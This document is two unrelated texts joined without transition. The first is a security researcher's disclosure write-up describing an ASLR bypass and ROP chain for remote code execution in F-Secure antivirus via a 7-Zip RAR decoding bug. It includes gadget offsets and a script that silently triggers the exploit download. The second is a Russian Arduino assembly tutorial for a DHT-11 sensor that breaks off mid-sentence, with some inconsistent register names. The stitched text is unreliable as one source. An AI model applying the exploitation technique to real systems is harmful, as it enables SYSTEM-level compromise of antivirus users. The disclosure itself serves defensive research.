F-Secure Anti-Virus: Remote Code Execution via Solid RAR Unpacking

As I briefly mentioned in my last two posts about the 7-Zip bugs CVE-2017-17969, CVE-2018-5996, and CVE-2018-10115, the products of at least one antivirus vendor were affected by those bugs. Now that all patches have been rolled out, I can finally make the vendor’s name public: It is F-Secure with all of its Windows-based endpoint protection products (including consumer products such as F-Secure Anti-Virus as well as corporate products such as F-Secure Server Security).

Even though F-Secure products are directly affected by the mentioned 7-Zip bugs, exploitation is substantially more difficult than it was in 7-Zip (before version 18.05), because F-Secure properly deploys ASLR. In this post, I am presenting an extension to my previous 7-Zip exploit of CVE-2018-10115 that achieves Remote Code Execution on F-Secure products.

Introduction

In my previous 7-Zip exploit, I demonstrated how we can use 7-Zip’s methods for RAR header processing to massage the heap. This was not completely trivial, but after that, we were basically done. Since 7-Zip 18.01 came without ASLR, a completely static ROP chain was enough to obtain code execution.

With F-Secure deploying ASLR, such a static ROP chain cannot work anymore, and an additional idea is required. In particular, we need to compute the ROP chain dynamically. In a scriptable environment, this is usually quite easy: Simply leak a pointer to derive the base address of some module, and then just add this base address to the prepared ROP chain.

Since the bug we try to exploit resides within RAR extraction code, a promising idea could be to use the RarVM as a scripting environment to compute the ROP chain. I am quite confident that this would work, if only the RarVM were actually available. Unfortunately, it is not: Even though 7-Zip’s RAR implementation supports the RarVM, it is disabled by default at compile time, and F-Secure did not enabled it either.

While it is almost certain the F-Secure engine contains some attacker-controllable scripting engine (outside of the 7-Zip module), it seemed difficult to exploit something like this in a reliable manner. Moreover, my goal was to find an ASLR bypass that works independently of any F-Secure features. Ideally, the new exploit would also work for 7-Zip (with ASLR), as well as any other software that makes use of 7-Zip as a library.

In the following, I will briefly recap the most important aspects of the exploited bug. Then, we will see how to bypass ASLR in order to achieve code execution.

The Bug

The bug I am exploiting is explained in detail in my previous blog post. In essence, it is an uninitialized memory usage that allows us to control a large part of a RAR decoder’s state. In particular, we are going to use the Rar1 decoder. The method NCompress::NRar1::CDecoder::LongLZ1 contains the following code:

if (AvrPlcB > 0x28ff) { distancePlace = DecodeNum(PosHf2); }
else if (AvrPlcB > 0x6ff) { distancePlace = DecodeNum(PosHf1); }
else { distancePlace = DecodeNum(PosHf0); }
// some code omitted
for (;;) {
  dist = ChSetB[distancePlace & 0xff];
  newDistancePlace = NToPlB[dist++ & 0xff]++;
  if (!(dist & 0xff)) { CorrHuff(ChSetB,NToPlB); }
  else { break; }
}

ChSetB[distancePlace] = ChSetB[newDistancePlace];
ChSetB[newDistancePlace] = dist;

This is very useful, because the uint32_t arrays ChSetB and NtoPlB are fully attacker controlled (since they are not initialized if we trigger this bug). Hence, newDistancePlace is an attacker-controlled uint32_t, and so is dist (with the restriction that the least significant byte cannot be 0xff). Moreover, distancePlace is determined by the input stream, so it is attacker-controlled as well.

So this gives us a pretty good read-write primitive. Note, however, that it has a few restrictions. In particular, the executed operation is basically a swap. We can use the primitive to do the following:

  • We can read arbitrary uint32_t values from 4-byte aligned 32-bit offsets starting from &ChSetB[0] into the ChSetB array. If we do this, we always overwrite the value we just read (since it is a swap).
  • We can write uint32_t values from the ChSetB array to arbitrary 4-byte aligned 32-bit offsets starting from &ChSetB[0]. Those values can be either constants, or values that we have read before into the ChSetB array. In any case, the least significant byte must not be 0xff. Furthermore, since we are swapping values, a written value is always destroyed (within the ChSetB array) and cannot be written a second time.

Lastly, note that the way the index newDistancePlace is determined restricts us further. First, we cannot do too many of such read/write operations, since the array NToPlB has only 256 elements. Second, if we are writing a value that is unknown in advance (say, a part of an address subject to ASLR), we might not know exactly what dist & 0xff is, so we need to fill (possibly many) different entries in the NToPlB with the desired index.

It is clear that this basic read-write primitive for itself is not enough to bypass ASLR. An additional idea is required.

Exploitation Strategy

We make use of roughly the same exploitation strategy as in the 7-Zip exploit:

  1. Place a Rar3 decoder object in constant distance after the Rar1 decoder containing the read-write primitive.
  2. Use the Rar3 decoder to extract the payload into the _window buffer.
  3. Use the read-write primitive to swap the Rar3 decoder’s vtable pointer with the _window pointer.

Recall that in the 7-Zip exploit, the payload we extracted in step 2 contained a stack pivot, the (static) ROP chain, and the shellcode. Obviously, such a static ROP chain cannot work in an environment with full ASLR. So how do we dynamically extract a valid ROP chain into the buffer without knowing any address in advance?

Bypassing ASLR

We are in a non-scriptable environment, but we still want to correct our ROP chain by a randomized offset. Specifically, we would like to add 64-bit integers.

Well, we might not need a full 64-bit addition. The ability to adjust an address by overwriting the least significant bytes of it could suffice. Note, however, that this does not work in general. Consider &f being a randomized address to some function. If the address was a completely uniform random 64-bit value, and we would just overwrite the least significant byte, then we would not know by how much we changed the address. However, the idea works if we know nothing about the address, except for the d least significant bytes. In this case, we can safely overwrite the d least significant bytes, and we will always know by how much we changed the address. Luckily2, Windows loads every module at a (randomized) 64K aligned address. This means, that the two least significant bytes of any code address will be constant.

Why is this idea useful in our case? As you might know, RAR is strongly based on Lempel–Ziv compression algorithms. In these algorithms, the coder builds a dynamic dictionary, which contains sequences of bytes that occurred earlier in the compressed stream. If a byte sequence is repeating itself, then it can be encoded efficiently as a reference to the corresponding entry in the dictionary.

In RAR, the concept of a dynamic dictionary occurs in a generalized form. In fact, on an abstract level, the decoder executes in every step one of the following two operations:

  1. PutByte(bytevalue), or
  2. CopyBlock(distance,num)

The operation CopyBlock copies num bytes, starting from distance bytes before the current position of the window buffer. This gives rise to the following idea:

  1. Use the read-write primitive to write a function pointer to the end of our Rar3 window buffer. This function pointer is the 8-byte address &7z.dll+c for some (known) constant c.
  2. The base address &7z.dll is strongly randomized, but it is always 64K aligned. Hence, we can make use of the idea explained at the beginning of this section: First, we write two arbitrary bytes of our choice (using two invocations of PutByte(b)). Then, we copy (by using a CopyBlock(d,n) operation) the six most significant bytes of the function pointer &7z.dll+c from the end of the window buffer. Together, they form eight bytes, a valid address, pointing to executable code.

Note that we are copying from the end of the window buffer. It turns out that this works in general, because the source index (currentpos - 1) - distance is computed modulo the size of the window. However, the 7-Zip implementation actually checks whether we copy from a distance greater than the current position and aborts if this is the case. Fortunately, it is possible to bypass this check by corrupting a member variable of the Rar3 decoder with the read-write primitive. I leave it as an (easy) exercise for the interested reader to figure out which variable this is and why this works.

ROP

The technique outlined in the previous section allows us to write a ROP chain that consists of addresses within a single 64K region of code. Does this suffice? Let’s see. We try to write the following ROP chain:

// pivot stack: xchg rax, rsp;
exec_buffer = VirtualAlloc(NULL, 0x1000, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
memcpy(exec_buffer, rsp+shellcode_offset, 0x1000);
jmp exec_buffer;

The crucial step of the chain is to call VirtualAlloc. All occurrences of jmp cs:VirtualAlloc I could find within F-Secure’s 7z.dll where at offsets of the form +0xd****. Unfortunately, I could not find an easy way to retrieve a pointer of this form within (or near) the Rar decoder objects. Instead, I could find a pointer of the form +0xc****, and used the following technique to turn it into a pointer of the form +0xd****:

  1. Use the read-write primitive to swap the largest available pointer of the form +0xc**** into the member variable LCount of the Rar1 decoder.
  2. Let the Rar1 decoder process a carefully crafted item, such that the member variable LCount is incremented (with a stepsize of one) until it has the form +0xd****.
  3. Use the read-write primitive to swap the member variable LCount into the end of the Rar3 decoder’s window buffer (see previous section).

As it turns out, the largest available pointer of the form +0xc**** is roughly +0xcd000, so we only need to increase it by 0x3000.

Being able to address a full 64K code region containing a jump to VirtualAlloc, I hoped that a ROP chain of the above form would be easy to achieve. Unfortunately, I simply could not do it, so I copied a second pointer to the window buffer. Two regions of 64K code, so 128K in total, were enough to obtain the desired ROP chain. It is still far from being nice, though. For example, this is how the stack pivot looks like:

0xd335c # push rax; cmp eax, 0x8b480002; or byte ptr [r8 - 0x77], cl; cmp bh, bh; adc byte ptr [r8 - 0x75], cl; pop rsp; and al, 0x48; mov rbp, qword ptr [rsp + 0x50]; mov rsi, qword ptr [rsp + 0x58]; add rsp, 0x30; pop rdi; ret;

Another example is how we set the register R9 to PAGE_EXECUTE_READWRITE (0x40) before calling VirtualAlloc:

# r9 := r9 >> 9
0xd6e75, # pop rcx; sbb al, 0x5f; ret;
0x9, # value popped into rcx
0xcdb4d, # shr r9d, cl; mov ecx, r10d; shl edi, cl; lea eax, dword ptr [rdi - 1]; mov rdi, qword ptr [rsp + 0x18]; and eax, r9d; or eax, esi; mov rsi, qword ptr [rsp + 0x10]; ret; 

This works, because R9 always has the value 0x8000 when we enter the ROP chain.

Wrapping up

We have seen a sketch of the basic exploitation idea. When actually implementing it, one has to overcome quite a few additional obstacles I have ignored to avoid boring you too much. Roughly speaking, the basic implementation steps are as follows:

  1. Use (roughly) the same heap massaging technique as in the 7-Zip exploit.
  2. Implement a basic Rar1 encoder to create a Rar1 item that controls the read-write primitive in the desired way.
  3. Implement a basic Rar3 encoder to create a Rar3 item that writes the ROP chain as well as the shellcode into the window buffer.

Finally, all items (even of different Rar versions) can be merged into a single archive, which leads to code execution when it is extracted.

Minimizing Required User Interaction

Virtually all antivirus products come with a so-called file system minifilter, which intercepts every file system access and triggers the engine to run background scans. F-Secure’s products do this as well. However, such automatic background scans do not extract compressed files. This means that it is not enough to send a victim a malicious RAR archive via e-mail. If one did this, it would be necessary for the victim to trigger a scan manually.

Obviously, this is still extremely bad, since the very purpose of antivirus software is to scan untrusted files. Yet, we can do better. It turns out that F-Secure’s products intercept HTTP traffic and automatically scan files received over HTTP if they are at most 5MB in size. This automatic scan includes (by default) the extraction of compressed files. Hence, we can deliver our victim a web page that automatically downloads the exploit file. In order to do this silently (preventing the user even from noticing that a download is triggered), we can issue an asynchronous HTTP request as follows:

<script>
  var xhr = new XMLHttpRequest(); 
  xhr.open('GET', '/exploit.rar', true); 
  xhr.responseType = 'blob';
  xhr.send(null);
</script>

Demo

The following demo video briefly presents the exploit running on a freshly installed and fully updated Windows 10 RS4 64-bit (Build 17134.81) with F-Secure Anti-Virus (also fully updated, but 7z.dll has been replaced with the unpatched version, which I have extracted from an F-Secure installation on April 15, 2018).

As you can see, the engine (fshoster64.exe) runs as NT AUTHORITY\SYSTEM, and the exploit causes it to start notepad.exe (also as NT AUTHORITY\SYSTEM).

Maybe you are asking yourself now why the shellcode starts notepad.exe instead of the good old calc.exe. Well, I tried to open calc.exe as NT AUTHORITY\SYSTEM, but it did not work. This has nothing to do with the exploit or the shellcode itself. It seems that it just does not work anymore with the new UWP calculator (it also fails to start when using psexec64.exe -i -s).

Conclusion

We have seen how an uninitialized memory usage bug can be exploited for arbitrary remote code execution as NT AUTHORITY\SYSTEM with minimal user interaction.

Apart from discussing the bugs and possible solutions with F-Secure, I have proposed three mitigation measures to harden their products:

  1. Sandbox the engine and make sure most of the code does not run under such high privileges.
  2. Stop snooping into HTTP traffic. This feature is useless anyway. It literally does not provide any security benefit whatsoever, since evading it requires the attacker only to switch from HTTP to HTTPS (F-Secure does not snoop into HTTPS traffic – thank God!). Hence, this feature only increases the attack surface of their products.
  3. Enable modern Windows exploitation mitigations such as CFG and ACG.

Finally, I want to remark that the presented exploitation technique is independent of any F-Secure features. It works on any product that uses the 7-Zip library to extract compressed RAR files, even if ASLR and DEP are enabled. For example, it is likely that Malwarebytes was affected3 as well.

 

Timeline of Disclosure

  • 2018-03-06 — Discovery of the bug in 7-Zip and F-Secure products (no reliably crashing PoC for F-Secure yet).
  • 2018-03-06 — Report to 7-Zip developer Igor Pavlov.
  • 2018-03-11 — Report to F-Secure (with reliably crashing PoC).
  • 2018-04-14 — MITRE assigned CVE-2018-10115 to the bug (for 7-Zip).
  • 2018-04-15 — Additional report to F-Secure that this was a highly critical vulnerability, and that I had a working code execution exploit for 7-Zip (only an ALSR bypass missing to attack F-Secure products). Proposed a detailed patch to F-Secure, and strongly recommended to roll out a fix without waiting for the upcoming 7-Zip update.
  • 2018-04-30 — 7-Zip 18.05 released, fixing CVE-2018-10115.
  • 2018-05-22 — F-Secure fix release via automatic update channel.
  • 2018-05-23 — Additional report to F-Secure with a full PoC for Remote Code Execution on various F-Secure products.
  • 2018-06-01 — Release of F-Secure advisory.
  • 2018-??-?? — Bug bounty paid.

Как программировать Arduino на ассемблере

Читаем данные с датчика температуры DHT-11 на «голом» железе Arduino Uno ATmega328p используя только ассемблер

Попробуем на простом примере рассмотреть, как можно “хакнуть” Arduino Uno и начать писать программы в машинных кодах, т.е. на ассемблере для микроконтроллера ATmega328p. На данном микроконтроллере собственно и собрана большая часть недорогих «классических» плат «duino». Данный код также будет работать на практически любой demo плате на ATmega328p и после небольших возможных доработок на любой плате Arduino на Atmel AVR микроконтроллере. В примере я постарался подойти так близко к железу, как это только возможно. Для лучшего понимания того, как работает микроконтроллер не будем использовать какие-либо готовые библиотеки, а уж тем более Arduino IDE. В качестве учебно-тренировочной задачи попробуем сделать самое простое что только возможно — правильно и полезно подергать одной ногой микроконтроллера, ну то есть будем читать данные из датчика температуры и влажности DHT-11.

Arduino очень клевая штука, но многое из того что происходит с микроконтроллером специально спрятано в дебрях библиотек и среды Arduino для того чтобы не пугать новичков. Поигравшись с мигающим светодиодом я захотел понять, как микроконтроллер собственно работает. Помимо утоления чисто познавательного зуда, знание того как работает микроконтроллер и стандартные средства общения микроконтроллера с внешним миром — это называется «периферия», дает преимущество при написании кода как для Arduino так и при написания кода на С/Assembler для микроконтроллеров а также помогает создавать более эффективные программы. Итак, будем делать все наиболее близко к железу, у нас есть: плата совместимая с Arduino Uno, датчик DHT-11, три провода, Atmel Studio и машинные коды.

Для начало подготовим нужное оборудование.

Писать код будем в Atmel Studio 7 — бесплатно скачивается с сайта производителя микроконтроллера — Atmel.

Atmel Studio 7

Весь код запускался на клоне Arduino Uno — у меня это DFRduino Uno от DFRobot, на контроллере ATmega328p работающем на частоте 16 MHz — отличная надежная плата. Каких-либо отличий от стандартного Uno в процессе эксплуатации я не заметил. Похожая чорная плата от DFBobot, только “Mega” отлетала у меня 2 года в качестве управляющего контроллера квадрокоптера — куда ее только не заносило — проблем не было.

DFRduino Uno

Для просмотра сигналов длительностью в микросекунды (а это на минутку 1 миллионная доля секунды), я использовал штуку, которая называется “логический анализатор”. Конкретно, я использовал клон восьмиканального USBEE AX Pro. Как смотреть для отладки такие быстрые процессы без осциллографа или логического анализатора — на самом деле даже не знаю, ничего посоветовать не могу.

Прежде всего я подключил свой клон Uno — как я говорил у меня это DFRduino Uno к Atmel Studio 7 и решил попробовать помигать светодиодиком на ассемблере. Как подключить описанно много где, один из примеров по ссылке в конце. Код пишется прямо в студии, прошивать плату можно через USB порт используя привычные возможности загрузчика Arduino -через AVRDude. Можно шить и через внешний программатор, я пробовал на китайском USBASP, по факту у меня оба способа работали. В обоих случаях надо только правильно настроить прошивальщик AVRDude, пример моих настроек на картинке

Полная строка аргументов:
-C “C:\avrdude\avrdude.conf” -p atmega328p -c arduino -P COM7 115200 -U flash:w:”$(ProjectDir)Debug\$(TargetName).hex:i

В итоге, для простоты я остановился на прошивке через USB порт — это стандартный способ для Arduio. На моей UNO стоит чип ATmega 328P, его и надо указать при создании проекта. Нужно также выбрать порт к которому подключаем Arduino — на моем компьютере это был COM7.

Для того, чтобы просто помигать светодиодом никаких дополнительных подключений не нужно, будем использовать светодиод, размещенный на плате и подключенный к порту Arduino D13 — напомню, что это 5-ая ножка порта «PORTB» контроллера.

Подключаем плату через USB кабель к компьютеру, пишем код в студии, прошиваем прямо из студии. Основная проблема здесь собственно увидеть это мигание, поскольку контроллер фигачит на частоте 16 MHz и, если включать и выключать светодиод такой же частотой мы увидим тускло горящий светодиод и собственно все.

Для того чтобы увидеть, когда он светится и когда он потушен, мы зажжем светодиод и займем процессор какой-либо бесполезной работой на примерно 1 секунду. Саму задержку можно рассчитать вручную зная частоту — одна команда выполняется за 1 такт или используя специальный калькулятор по ссылки внизу. После установки задержки, код выполняющий примерно то же что делает классический «Blink» Arduino может выглядеть примерно так:

      			cli
			sbi DDRB, 5	; PORT B, Pin 5 - на выход
			sbi PORTB, 5	; выставили на Pin 5 лог единицу

loop:						    ; delay 1000 ms
			ldi  r18, 82
			ldi  r19, 43
			ldi  r20, 0
L1:			dec  r20
			brne L1
			dec  r19
			brne L1
			dec  r18
			brne L1
			nop
			
			in R16, PORTB	; переключили XOR 5-ый бит в порту
			ldi R17, 0b00100000
			EOR R16, R17
			out PORTB, R16
			
			rjmp loop
еще раз — на моей плате светодиод Arduino (D13) сидит на 5 ноге порта PORTB ATmeg-и.

Но на самом деле так писать не очень хорошо, поскольку мы полностью похерили такие важные штуки как стек и вектор прерываний (о них — позже).

Ок, светодиодиком помигали, теперь для того чтобы практика работа с GPIO была более или менее осмысленной прочитаем значения с датчика DHT11 и сделаем это также целиком на ассемблере.

Для того чтобы прочитать данные из датчика нужно в правильной последовательность выставлять на рабочей линии датчика сигналы высокого и низкого уровня — собственно это и называется дергать ногой микроконтроллера. С одной стороны, ничего сложного, с другой стороны все какая-то осмысленная деятельность — меряем температуру и влажность — можно сказать сделали первый шаг к построению какой ни будь «Погодной станции» в будущем.

Забегая на один шаг вперед, хорошо бы понять, а что собственно с прочитанными данными будем делать? Ну хорошо прочитали мы значение датчика и установили значение переменной в памяти контроллера в 23 градуса по Цельсию, соответственно. Как посмотреть на эти цифры? Решение есть! Полученные данные я буду смотреть на большом компьютере выводя их через USART контроллера через виртуальный COM порт по USB кабелю прямо в терминальную программу типа PuTTY. Для того чтобы компьютер смог прочитать наши данные будем использовать преобразователь USB-TTL — такая штука которая и организует виртуальный COM порт в Windows.

Сама схема подключения может выглядеть примерно так:

Сигнальный вывод датчика подключен к ноге 2 (PIN2) порта PORTD контролера или (что то же самое) к выводу D2 Arduino. Он же через резистор 4.7 kOm “подтянут” на “плюс” питания. Плюс и минус датчика подключены — к соответствующим проводам питания. USB-TTL переходник подключен к выходу Tx USART порта Arduino, что значит PIN1 порта PORTD контроллера.

В собранном виде на breadboard:

Разбираемся с датчиком и смотрим datasheet. Сам по себе датчик несложный, и использует всего один сигнальный провод, который надо подтянуть через резистор к +5V — это будет базовый «высокий» уровень на линии. Если линия свободна — т.е. ни контроллер, ни датчик ничего не передают, на линии как раз и будет базовый «высокий» уровень. Когда датчик или контроллер что-то передают, то они занимают линию — устанавливают на линии «низкий» уровень на какое-то время. Всего датчик передает 5 байт. Байты датчик передает по очереди, сначала показатели влажности, потом температуры, завершает все контрольной суммой, это выглядит как “HHTTXX”, в общем смотрим datasheet. Пять байт — это 40 бит и каждый бит при передаче кодируется специальным образом.

Для упрощения, будет считать, что «высокий» уровень на линии — это «единица», а «низкий» соответственно «ноль». Согласно datasheet для начала работы с датчиком надо положить контроллером сигнальную линию на землю, т.е. получить «ноль» на линии и сделать это на период не менее чем 20 милсек (миллисекунд), а потом резко отпустить линию. В ответ — датчик должен выдать на сигнальную линию свою посылку, из сигналов высокого и низкого уровня разной длительности, которые кодируют нужные нам 40 бит. И, согласно datasheet, если мы удачно прочитаем эту посылку контроллером, то мы сразу поймем что: а) датчик собственно ответил, б) передал данные по влажности и температуре, с) передал контрольную сумму. В конце передачи датчик отпускает линию. Ну и в datasheet написано, что датчик можно опрашивать не чаще чем раз в секунду.

Итак, что должен сделать микроконтроллер, согласно datasheet, чтобы датчик ему ответил — нужно прижать линию на 20 миллисекунд, отпустить и быстро смотреть, что на линии:

Датчик должен ответить — положить линию в ноль на 80 микросекунд (мксек), потом отпустить на те же 80 мксек — это можно считать подтверждением того, что датчик на линии живой и откликается:

После этого, сразу же, по падению с высокого уровня на нижний датчик начинает передавать 40 отдельных бит. Каждый бит кодируются специальной посылкой, которая состоит из двух интервалов. Сначала датчик занимает линию (кладет ее в ноль) на определенное время — своего рода первый «полубит». Потом датчик отпускает линию (линия подтягивается к единице) тоже на определенное время — это типа второй «полубит». Длительность этих интервалов — «полубитов» в микросекундах кодирует что собственно пытается передать датчик: бит “ноль” или бит “единица”.

Рассмотрим описание битовой посылки: первый «полубит» всегда низкого уровня и фиксированной длительности — около 50 мксек. Длительность второго «полубита» определят, что датчик собственно передает.

Для передачи нуля используется сигнал высокого уровня длительностью 26–28 мксек:

Для передачи единицы, длительность сигнала высокого увеличивается до 70 микросекунд:

Мы не будет точно высчитывать длительность каждого интервала, нам вполне достаточно понимания, что если длительность второго «полубита» меньше чем первого — то закодирован ноль, если длительность второго «полубита» больше — то закодирована единица. Всего у нас 40 бит, каждый бит кодируется двумя импульсами, всего нам надо значит прочитать 80 интервалов. После того как прочитали 80 интервалов будем сравнить их попарно, первый “полубит” со вторым.

Вроде все просто, что же требуется от микроконтроллера для того чтобы прочитать данные с датчика? Получается нужно значит дернуть ногой в ноль, а потом просто считать всю длинную посылку с датчика на той же ноге. По ходу, будем разбирать посылку на «полу-биты», определяя где передается бит ноль, где единица. Потом соберем получившиеся биты, в байты, которые и будут ожидаемыми данными о влажности и температуре.

Ок, мы начали писать код и для начала попробуем проверить, а работает ли вообще датчик, для этого мы просто положим линию на 20 милсек и посмотрим на линии, что из этого получится логическим анализатором.

Определения:

==========		DEFINES =======================================
; определения для порта, к которому подключем DHT11			
				.EQU DHT_Port=PORTD
				.EQU DHT_InPort=PIND
				.EQU DHT_Pin=PORTD2
				.EQU DHT_Direction=DDRD
				.EQU DHT_Direction_Pin=DDD2

				.DEF Tmp1=R16
				.DEF USART_ByteR=R17		; переменная для отправки байта через USART
				.DEF Tmp2=R18
				.DEF USART_BytesN=R19		; переменная - сколько байт отправить в USART
				.DEF Tmp3=R20
				.DEF Cycle_Count=R21		; счетчик циклов в Expect_X
				.DEF ERR_CODE=R22			; возврат ошибок из подпрограмм
				.DEF N_Cycles=R23			; счетчик в READ_CYCLES
				.DEF ACCUM=R24
				.DEF Tmp4=R25

Как я уже писал сам датчик подключен на 2 ногу порта D. В Arduino Uno это цифровой выход D2 (смотрим для проверки Arduino Pinout).

Все делаем тупо: инициализировали порт на выход, выставили ноль, подождали 20 миллисекунд, освободили линию, переключили ногу в режим чтения и ждем появление сигналов на ноге.

;============	DHD11 INIT =======================================
; после инициализации сразу !!!! надо считать ответ контроллера и собственно данные
DHT_INIT:		CLI	; еще раз, на всякий случай - критичная ко времени секция

				; сохранили X для использования в READ_CYCLES - там нет времени инициализировать
				LDI XH, High(CYCLES)	; загрузили старшйи байт адреса Cycles
				LDI XL, Low (CYCLES)	; загрузили младший байт адреса Cycles

				LDI Tmp1, (1<<DHT_Direction_Pin)
				OUT DHT_Direction, Tmp1			; порт D, Пин 2 на выход

				LDI Tmp1, (0<<DHT_Pin)
				OUT DHT_Port, Tmp1			; выставили 0 

				RCALL DELAY_20MS		; ждем 20 миллисекунд

				LDI Tmp1, (1<<DHT_Pin)		; освободили линию - выставили 1
				OUT DHT_Port, Tmp1	

				RCALL DELAY_10US		; ждем 10 микросекунд

				
				LDI Tmp1, (0<<DHT_Direction_Pin)		; порт D, Pin 2 на вход
				OUT DHT_Direction, Tmp1	
				LDI Tmp1,(1<<DHT_Pin)		; подтянули pull-up вход на вместе с внешним резистором на линии
				OUT DHT_Port, Tmp1		

; ждем ответа от сенсора - он должен положить линию в ноль на 80 us и отпустить на 80 us

Смотрим анализатором — а ответил ли датчик?

Да, ответ есть — вот те сигналы после нашего первого импульса в 20 милсек — это и есть ответ датчика. Для просмотра посылки я использовал китайский клон USBEE AX Pro который подключен к сигнальному проводу датчика.

Растянем масштаб так чтобы увидеть окончание нашего импульса в 20 милсек и лучше увидеть начало посылки от датчика — смотрим все как в datasheet — сначала датчик выставил низкий/высокий уровень по 80 мксек, потом начал передавать биты — а данном случае во втором «полубите» передается «0»

Значит датчик работает и данные нам прислал, теперь надо эти данные правильно прочитать. Поскольку задача у нас учебная, то и решать ее будем тупо в лоб. В момент ответа датчика, т.е. в момент перехода с высокого уровня в низкий, мы запустим цикл с счетчиком числа повторов нашего цикла. Внутри цикла, будем постоянно следить за уровнем сигнала на ноге. Итого, в цикле будем ждать, когда сигнал на ноге перейдет обратно на высокий уровень — тем самым определив длительность сигнала первого «полубита». Наш микроконтроллер работает на частоте 16 MHz и за период например в 50 микросекунд контроллер успеет выполнить около 800 инструкций. Когда на линии появится высокий уровень — то мы из цикла аккуратно выходим, а число повторов цикла, которые мы отсчитали с использованием счетчика — запоминаем в переменную.

После перехода сигнальной линии уже на высокий уровень мы делаем такую же операцию– считаем циклы, до момента когда датчик начнет передавать следующий бит и положит линию в низкий уровень. К счастью, нам не надо знать точный временной интервал наших импульсов, нам достаточно понимать, что один интервал больше другого. Понятно, что если датчик передает бит «ноль» то длительность второго «полубита» и соответственно число циклов, которые мы отсчитали будет меньше чем длительность первого «полубита». Если же датчик передал бит «единица», то число циклов которые мы насчитаем во время второго полубита будет больше чем в первым.

И для того что бы мы не висели вечно, если вдруг датчик не ответил или засбоил, сам цикл мы будем запускать на какой-то временной период, но который гарантированно больше самой длинной посылки, чтоб если датчик не ответил, то мы смогли выйти по тайм-ауту.

В данном случае показан пример для ситуации, когда у нас на линии был ноль, и мы считаем сколько раз мы в цикле мы считали состояние ноги контроллера, пока датчик не переключил линию в единицу.

;=============	EXPECT 1 =========================================
; крутимся в цикле ждем нужного состояния на пине
; когда появилось - выходим
; сообщаем сколько циклов ждали
; или сообщение об ошибке тайм оута если не дождались
EXPECT_1:		LDI Cycle_Count, 0			; загрузили счетчик циклов
			LDI ERR_CODE, 2			; Ошибка 2 - выход по тайм Out

			ldi  Tmp1, 2			; Загрузили 
			ldi  Tmp2, 169			; задержку 80 us

EXP1L1:			INC Cycle_Count			; увеличили счетчик циклов

			IN Tmp3, DHT_InPort		; читаем порт
			SBRC Tmp3, DHT_Pin	; Если 1 
			RJMP EXIT_EXPECT_1	; То выходим
			dec  Tmp2			; если нет то крутимся в задержке
			brne EXP1L1
			dec  Tmp1
			brne EXP1L1
			NOP					; Здесь выход по тайм out
			RET

EXIT_EXPECT_1:		LDI ERR_CODE, 1			; ошибка 1, все нормально, в Cycle_Count счетчик циклов
			RET

Аналогичная подпрограмма используется для того, чтобы посчитать сколько циклов у нас должно прокрутиться, пока датчик из состояния ноль на линии переложил линию в состояние единицы.

Для расчета временных задержек мы будет использовать тот же подход, который мы использовали при мигании светодиодом — подберем параметры пустого цикла для формирования нужной паузы. Я использовал специальный калькулятор. При желании можно посчитать число рабочих инструкций и вручную.

Памяти в нашем контроллере довольно много — аж 2 (Два) килобайта, так что мы не будем жлобствовать с памятью, и тупо сохраним данные счетчиков относительно наших 80 ( 40 бит, 2 интервала на бит) интервалов в память.

Объявим переменную

CYCLES: .byte 80 ; буфер для хранения числа циклов

И сохраним все считанные циклы в память.

;============== READ CYCLES ====================================
; читаем биты контроллера и сохраняем в Cycles 
READ_CYCLES:	LDI N_Cycles, 80			; читаем 80 циклов
READ:		NOP
		RCALL EXPECT_1				; Открутился 0
		ST X+, Cycles_Counter			; Сохранили число циклов 
			
		RCALL EXPECT_0
		ST X+, Cycles_Counter			; Сохранили число циклов 
		
		DEC N_Cycles				; уменьшили счетчик
		BRNE READ					
		RET					; все циклы считали

Теперь, для отладки, попробуем посмотреть насколько удачно посчиталось длительность интервалов и понять действительно ли мы считали данные из датчика. Понятно, что число отсчитанных циклов первого «полубита» должно быть примерно одинаково у всех битовых посылок, а вот число циклов при отсчете второго «полубита» будет или существенно меньше, или наоборот существенно больше.

Для того чтобы передавать данные в большой компьютер будем использовать USART контроллера, который через USB кабель будет передавать данные в программу — терминал, например PuTTY. Передаем опять же тупо в лоб — засовываем байт в нужный регистр управления USART-а и ждем, когда он передастся. Для удобства я также использовал пару подпрограмм, типа — передать несколько байт, начиная с адреса в Y, ну и перевести каретку в терминале для красоты.

;============	SEND 1 BYTE VIA USART =====================
SEND_BYTE:	NOP
SEND_BYTE_L1:	LDS Tmp1, UCSR0A
		SBRS Tmp1, UDRE0			; если регистр данных пустой
		RJMP SEND_BYTE_L1
		STS UDR0, USART_ByteR		; то шлем байт из R17
		NOP
		RET				

;============	SEND CRLF VIA USART ===============================
SEND_CRLF:	LDI USART_ByteR, $0D
		RCALL SEND_BYTE	
		LDI USART_ByteR, $0A
		RCALL SEND_BYTE
		RET			

;============	SEND N BYTES VIA USART ============================
; Y - что слать, USART_BytesN - сколько байт
SEND_BYTES:	NOP
SBS_L1:		LD USART_ByteR, Y+
		RCALL SEND_BYTE
		DEC USART_BytesN
		BRNE SBS_L1
		RET

Отправив в терминал число отсчётов для 80 интервалов, можно попробовать собрать собственно значащие биты. Делать будем как написано в учебнике, т.е. в datasheet — попарно сравним число циклов первого «полубита» с числом циклов второго. Если вторые пол-бита короче — значит это закодировать ноль, если длиннее — то единица. После сравнения биты накапливаем в аккумуляторе и сохраняем в память по-байтово начиная с адреса BITS.

;=============	GET BITS ===============================================
; Из Cycles делаем байты в  BITS				
GET_BITS:			LDI Tmp1, 5			; для пяти байт - готовим счетчики
				LDI Tmp2, 8			; для каждого бита
				LDI ZH, High(CYCLES)	; загрузили старшйи байт адреса Cycles
				LDI ZL, Low (CYCLES)	; загрузили младший байт адреса Cycles
				LDI YH, High(BITS)	; загрузили старший байт адреса BITS
				LDI YL, Low (BITS)	; загрузили младший байт адреса BITS

ACC:				LDI ACCUM, 0			; акамулятор инициализировали
				LDI Tmp2, 8			; для каждого бита

TO_ACC:				LSL ACCUM				; сдвинули влево
				LD Tmp3, Z+			; считали данные [i]
				LD Tmp4, Z+			; о циклах и [i+1]
				CP Tmp3, Tmp4			; сравнить первые пол бита с второй половину бита если положительно - то BITS=0, если отрицительно то BITS=1
				BRPL J_SHIFT		; если положительно (0) то просто сдвиг	
				ORI ACCUM, 1			; если отрицательно (1) то добавили 1
J_SHIFT:			DEC Tmp2				; повторить для 8 бит
				BRNE TO_ACC
				ST Y+, ACCUM			; сохранили акамулятор
				DEC Tmp1				; для пяти байт
				BRNE ACC
				RET

Итак, здесь мы собрали в памяти начиная с метки BITS те пять байт, которые передал контроллер. Но работать с ними в таком формате не очень неудобно, поскольку в памяти это выглядит примерно, как:
